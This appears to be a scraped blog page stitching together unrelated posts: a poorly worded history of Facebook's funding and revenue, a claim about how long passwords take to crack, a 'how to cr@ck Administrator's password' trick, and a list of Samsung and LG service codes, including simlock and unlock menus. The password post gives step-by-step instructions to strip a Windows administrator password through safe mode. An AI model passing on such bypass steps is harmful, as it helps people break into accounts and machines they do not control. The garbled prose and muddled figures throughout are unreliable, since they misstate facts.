capital funds and ACCEL Partners continue to receive 27.5 million from Greylock Partners. Facebook had been rumored to be acquired. Yahoo, Google has also proposed acquisition of Facebook for $ 1 billion. However, Zuckerberg has confirmed the sale of Facebook is “ impossible” because he wants to keep Facebook independent and not merged or moved to any one company. September 2007, Microsoft set out a plan to invest in Facebook. Also this time, other companies, including Google, also expressed his desire to purchase a portion Facebook. Finally, Facebook has chosen Microsoft. On 24/10/2007, Microsoft claims to buy 1.6% stake in Facebook for $ 240 million , giving Facebook a market value of about $ 15 billion. With this deal, Microsoft also bought the right to always put the international advertising on Facebook. 11/2007, Hong Kong billionaire Li Ka-shing invested $ 60 million back into Facebook. Today, billionaire Mark Zuckerberg is one of the world. According to Wikipedia, Facebook’ s revenue in 2006 reached 52 million USD in 2007 reached $ 150 million, in 2008 reached $ 280 million, in 2009 reached $ 800 million and in 2010 was estimated at $ 1.1 billion. Indeed, the financial figures of Facebook has always been hidden from the company, this is normal for a private company. Although not officially on the stock market, but Facebook’ s stock has traded in the market. The deals and investments have recently priced up to $ 50 billion for Facebook , even $ 85 billion.

how Long Does It Take Hacker To Crack The Password?

A password that contains 6 letters case,
the h@cker only takes 10 minutes to time out when they needed to take more than 44,000 years with the password contain 9 letters including number, symbols, upper case and lower case. Journal of Business Week (USA) statistical time needed to break a password, to help people use self- calculation to see how long it takes for h@ckers can penetrate into account e- mail, the service of their chat.

how to cr@ck Administrator's password see here

firstly start ur pc and it will ask for pass then here is the trick for it 
#1 boot into safe mode (press F8 before windows starts),

#2 log onto the account named "administaor" NOT your normal account

#3 go into control panal and remove password from user account settings.
any problem comment here............

All Mobile Handset Secret Codes....!

All Mobile Handset Secret Codes....!
For SAMSUNG:
*#06# Displays imei
*2767*5282# Java reset and (deletes all java midlets)
*2767*63342# Reset media (deletes all sounds and pics)
*2767*927# Wap reset
*#9998*4357# Help menu
*#9998*5282# Java menu
*#9999#0# Monitor mode
*#9999# Software version
*#8888# Hardware version
*#9998*746# Sim info
*#9998*523# Display contrast
*#9998*842# Vibration on (until you push ok)
*#999*289# Buzzer on (until you push ok)
*#9998*288# Battery and field info
*#9998*377# Error log
*#9998*778# Sim service table
*#9998*782# Show date and alaram clock
*#8999*638# Show network information
*#9998*5646# Change operator logo at startup
*#9998*76# Production number
*#9998*968# View melody for alarm
*#9998*585# Non volatile memory
*#3243948# Digital audio interference off
*#32436837# Digital audio interference
*#9999# Show software version
*#0837# Show software version (instruction)
*#0001# Show s*r*al parameters
*#9125# Activates the smiley when charging
*#9998*228# Battery status (capacity, voltage, temperature)
*#9998*246# Program status
*#9998*324# Debug screens
*#9998*364# Watchdog
*#9998*427# Trace watchdog
*#9998*544# Jig detect
*#9998*636# Memory status
*#9998*837# Software version
*#9998*862 Vocoder reg-normal, earphone or carkit can be selected
*#998*872# Diag
*#9998*947# Reset on fatal error
*#9998*999# Last/ check
*#9998*9999# Software version
*2767*2878# Custom EEPROM reset

For LG Mobile:
LG all models test mode: Type 2945#*# on the main screen.
2945*#01*# Secret menu for LG
IMEI (ALL): *#06#
IMEI and SW (LG 510): *#07#
Software version (LG B1200): *8375#
Recount cheksum (LG B1200): *6861#
Factory test (B1200): #PWR 668
Simlock menu (LG B1200): 1945#*5101#
Simlock menu (LG 510W, 5200): 2945#*5101#
Simlock menu (LG 7020, 7010): 2945#*70001#
Simlock menu (LG 500, 600): 2947#*
LG-U81XX SPECIAL CODES
Code to read phone version :

- Phone without SIM
- Enter 277634#*# or 47328545454#
- Select 'SW Ver.info'
Code to reset phone :
- Phone without SIM
- Enter 277634#*# or 47328545454#
- Select 'Factory Reset'
Code to enter UNLOCK MENU :
- Phone wit SIM inside
- Enter 2945#*88110#
Test Menu 8330 : 637664#*#
Test Menu 8180 V10a: 49857465454#
Test Menu 8180 V11a: 492662464663#
Test Menu 8130-8138: 47328545454#
Test Menu 8110-8120: 277634#*#

Twitter Delicious Facebook Digg Stumbleupon Favorites More

 

Recent Posts

Followers